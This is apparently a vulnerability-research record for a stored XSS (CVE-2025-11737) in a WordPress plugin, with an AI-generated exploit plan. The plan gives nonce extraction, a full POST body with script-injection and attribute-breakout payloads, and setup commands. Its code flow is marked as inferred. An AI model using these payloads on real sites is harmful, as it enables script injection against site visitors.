[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGP8ULAyd9VMDLt5JT6VUJ1HCw-wevAtuRVXJM7joihQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2025-11737","vk-all-in-one-expansion-unit-authenticated-contributor-stored-cross-site-scripting-via-sns-title","VK All in One Expansion Unit \u003C= 9.112.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via SNS Title","The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_sns_title' parameter in all versions up to, and including, 9.112.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","vk-all-in-one-expansion-unit",null,"\u003C=9.112.3","9.112.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-17 16:43:06","2026-05-12 14:38:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1e7efb39-fada-4167-825c-21cc31948a63?source=api-prod",84,[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2025-11737**, a Stored Cross-Site Scripting (XSS) vulnerability in the **VK All in One Expansion Unit** plugin for WordPress.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS) via the `vkExUnit_sns_title` parameter.\n*   **Affected Versions:** \u003C= 9.112.3.\n*   **Vulnerable Component:** The \"SNS\" (Social Networking Service) settings module, specifically the portion that allows users to override the title for Open Graph (OG) or Twitter Cards on a per-post basis.\n*   **Root Cause:** The plugin fails to adequately sanitize the `vkExUnit_sns_title` input when saving post meta and fails to escape the value when outputting it in the `\u003Chead>` section of the page (usually within meta tags like `og:title` or `twitter:title`).\n*   **Required Privileges:** Contributor or higher (users with the `edit_posts` capability).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fpost.php` (for existing posts) or `\u002Fwp-admin\u002Fpost-new.php` (for new posts).\n*   **Action:** `editpost` (standard WordPress post update).\n*   **Parameter:** `vkExUnit_sns_title`.\n*   **Preconditions:** The \"SNS\" module must be active within the VK All in One Expansion Unit settings.\n*   **Persistence:** The payload is stored in the `wp_postmeta` table and persists until the post is deleted or the meta value is manually updated.\n\n### 3. Code Flow (Inferred)\n1.  **Input:** An authenticated Contributor submits a post edit form. The POST request includes `vkExUnit_sns_title=\u003Cscript>alert(1)\u003C\u002Fscript>`.\n2.  **Storage:** The plugin registers a hook (likely `save_post`) that processes fields from the VK ExUnit meta box.\n    *   Function: Likely within a class handling post meta, e.g., `VkExUnit_Sns_Admin::save_post_meta`.\n    *   Logic: `update_post_meta($post_id, 'vkExUnit_sns_title', $_POST['vkExUnit_sns_title'])` is called without `sanitize_text_field`.\n3.  **Output:** When a user (admin or public) views the post.\n    *   Hook: `add_action('wp_head', ...)` or a similar hook used for SEO\u002FSNS meta tags.\n    *   Function: Likely `VkExUnit_Sns_Public::output_ogp` or similar.\n    *   Logic: The value of `vkExUnit_sns_title` is retrieved using `get_post_meta`.\n    *   Sink: The value is echoed directly into a `\u003Cmeta>` tag attribute or content without `esc_attr` or `esc_html`.\n\n### 4. Nonce Acquisition Strategy\nSince this exploit leverages the standard WordPress post-editing flow, the primary nonces required are those generated by WordPress core for post editing.\n\n1.  **Identify Shortcode\u002FTrigger:** The SNS meta box appears on the standard Post\u002FPage editor. No specific shortcode is needed to *trigger* the vulnerability, but the plugin must be active.\n2.  **Create\u002FEdit Post:**\n    *   Navigate to `\u002Fwp-admin\u002Fpost-new.php`.\n    *   Extract the `_wpnonce` from the form (action: `add-post`).\n    *   Extract the `_wp_http_referer`.\n3.  **JavaScript Extraction:**\n    The execution agent should use `browser_navigate` to the post editor and then:\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")` to get the core WordPress nonce.\n    *   Check for plugin-specific nonces in the VK ExUnit meta box if `check_admin_referer` is used by the plugin (e.g., `browser_eval(\"document.querySelector('#vkExUnit_sns_nonce')?.value\")`).\n\n### 5. Exploitation Strategy\n\n**Step 1: Setup**\nCreate a Contributor-level user and ensure the plugin is active.\n\n**Step 2: Payload Injection**\nSubmit a POST request to `\u002Fwp-admin\u002Fpost.php` to save the malicious SNS title.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload (Body):**\n    ```\n    action=editpost\n    &post_ID=[POST_ID]\n    &_wpnonce=[NONCE]\n    &_wp_http_referer=\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=edit\n    &post_title=XSS Test\n    &vkExUnit_sns_title=\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    &vkExUnit_sns_description=TestDescription\n    ```\n    *Note: The payload `\">\u003Cscript>...` is designed to break out of the `content` attribute of a `\u003Cmeta>` tag.*\n\n**Step 3: Verification (Frontend)**\nNavigate to the frontend URL of the post created\u002Fedited.\n\n### 6. Test Data Setup\n1.  **Plugin Status:** Ensure `vk-all-in-one-expansion-unit` is installed and activated.\n2.  **User:** Create a contributor:\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Post:** Create an initial post for the contributor to edit:\n    `wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title=\"Target Post\"`\n\n### 7. Expected Results\n*   The POST request should return a `302 Redirect` back to the post editor.\n*   When viewing the frontend of the post or the \"Preview,\" the HTML source should contain:\n    `\u003Cmeta property=\"og:title\" content=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">` (or similar depending on the specific meta tag used).\n*   A browser alert box should appear showing the site domain.\n\n### 8. Verification Steps (Post-Exploit)\nConfirm the metadata is stored in the database:\n`wp post meta get [POST_ID] vkExUnit_sns_title`\nExpected output: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n\n### 9. Alternative Approaches\n*   **Meta Box Check:** If the plugin uses a different meta key (e.g., a serialized array), use `wp post meta list [POST_ID]` to find the exact key used by VK ExUnit.\n*   **Attribute Breakout:** If the payload is rendered inside an attribute but the plugin performs basic escaping of `>`, try a payload that uses event handlers:\n    `vkExUnit_sns_title='onmouseover=alert(1) style=position:fixed;top:0;left:0;width:100%;height:100%;'` (if injected into a tag that supports event handlers).\n*   **Twitter Card Sink:** Check if the payload reflects in `twitter:title` or `twitter:description` if `og:title` is sanitized but others are not.","gemini-3-flash-preview","2026-04-19 06:33:55","2026-04-19 06:34:16",{"type":30,"vulnerable_version":31,"fixed_version":9,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":9,"fixed_zip":9,"all_tags":34},"plugin","9.112.3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvk-all-in-one-expansion-unit\u002Ftags\u002F9.112.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fvk-all-in-one-expansion-unit.9.112.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvk-all-in-one-expansion-unit\u002Ftags"]